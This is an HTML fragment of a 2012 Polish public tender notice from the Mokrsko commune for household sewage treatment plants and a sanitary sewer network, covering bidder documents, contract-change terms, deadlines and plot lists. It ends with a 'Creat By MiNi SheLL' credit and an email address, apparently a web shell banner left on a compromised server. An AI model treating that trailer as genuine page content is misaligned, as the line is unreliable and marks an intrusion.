<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające równoważność oferowanych materiałów i urządzeń w przypadku składania ofert równoważnych.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową oraz w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego ze sztuką budowlaną i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy .
Wynagrodzenie  zostanie zmienione w przypadku urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku Vat. 
Przewiduje się możliwość rezygnacji z wykonywania części robót przewidzianych w dokumentacji projektowej w sytuacji, gdy ich wykonanie będzie zbędne oraz w sytuacji rezygnacji właściciela działki, na której ma być wykonana oczyszczalnia przydomowa. Roboty takie w dalszej części umowy nazwane są robotami zaniechanymi. Sposób wyliczenia wartości tych robót określa § 2 ust. 5  umowy. 
Termin realizacji zadania ulegnie przesunięciu w przypadku wystąpienia opóźnień wynikających z:
a)przestojów i opóźnień zawinionych przez Zamawiającego,
b)działania siły wyższej (na przykład klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania robót;
c)wystąpienia sytuacji, o których mowa w ust. 4 i 5 niniejszego paragrafu  powodujących niemożliwość dotrzymania terminu zakończenia i odbioru przedmiotu umowy;  
d)wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi zostać zgłoszony Zamawiającemu i musi zostać potwierdzony przez inspektora nadzoru, 
e)wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności; 
f)wykopalisk uniemożliwiających wykonywanie robót,
g)konieczności wykonania zamówień dodatkowych;
Istnieje możliwość dokonania zmiany kierownika budowy oraz pozostałych osób przedstawionych w ofercie przetargowej, jedynie za uprzednią pisemną zgodą Zamawiającego.
Wykonawca z własnej inicjatywy proponuje zmianę osób wyszczególnionych w ust. 3 niniejszego paragrafu w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych;
b)	jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn.
W przypadku zmiany osób wyszczególnionych w ust. 3 niniejszego paragrafu, nowe osoby powołane do pełnienia w/w obowiązków muszą spełniać wymagania określone w specyfikacji istotnych warunków zamówienia dla danej funkcji.
Zamawiający może także zażądać od Wykonawcy zmiany osób, o których mowa w ust. 3 niniejszego paragrafu, jeżeli uzna, że nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mokrsko.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Mokrsku pokój nr 9
98-345 Mokrsko 231.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 12:00, miejsce: Urząd Gminy w Mokrsku pokój nr 9
98-345 Mokrsko 231.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie  dofinansowane przez Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich (EFRROW)  w ramach PROW na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa przydomowych oczyszczalni ścieków na terenie Gminy Mokrsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	W ramach zadania przewiduje się budowę 95 szt. przydomowych oczyszczalni ścieków w miejscowościach (na wymienionych działkach):
Brzeziny - 29, 9, 10, 12,
Chotów - 445/2, 160, 122/3, 122/5, 126, 141, 134, 104/1, 104/2, 103, 445/1
Komorniki - 514, 439, 511, 444, 505,
Krzyworzeka - 210/1, 813/3, 810, 806, 805/3, 805/4, 808/3, 812/4, 97
Lipie - 263, 231, 232, 286,
Mątewki - 1/3, 37, 38, 82, 72, 17, 18, 13/4, 51, 43, 3, 4, 81
Mokrsko - 1117, 1116, 1587/1, 1125, 217/2, 33, 1124,
Motyl Żelazna - 175/1, 771, 173, 172/1, 822, 169, 168/1, 168/2, 186, 185/4
Mokrsko Kośnik dz. nr 1153
Ożarow - 253, 2780/1, 86, 701/9, 670, 671/1, 671/2, 672, 669/3, 676, 586/1, 587, 589, 590, 39, 552, 128, 603, 599,
Ożarow Kocilew - 593, 608,
Ożarow Sikornik - 867/1, 495, 496,
Ożarow Słoniny - 666, 664, 663, 631, 633,
Słupsko - 168/2, 220, 150/3, 139, 136, 130, 12, 10/1, 99, 100,
Stanisławów - 769/1, 769/2, 773/2,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa kanalizacji sanitarnej z przyłączami kanalizacyjnymi i przepompowniami ścieków zlokalizowanej na działkach w obrębach - Brzeziny, Chotów, Krzyworzeka, Mokrsko, Ożarów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa kanalizacji sanitarnej z przyłączami kanalizacyjnymi i przepompowniami ścieków zlokalizowanej na działkach w obrębach - Brzeziny, Chotów, Krzyworzeka, Mokrsko, Ożarów

Jest to część zaprojektowanej sieci kanalizacji sanitarnej pracującej w systemie grawitacyjno-tłocznym obejmującej swym zasięgiem zlewnię miejscowości Krzyworzeka, Chotów, Ożarów i Mokrsko..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9, 45.23.24.23-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com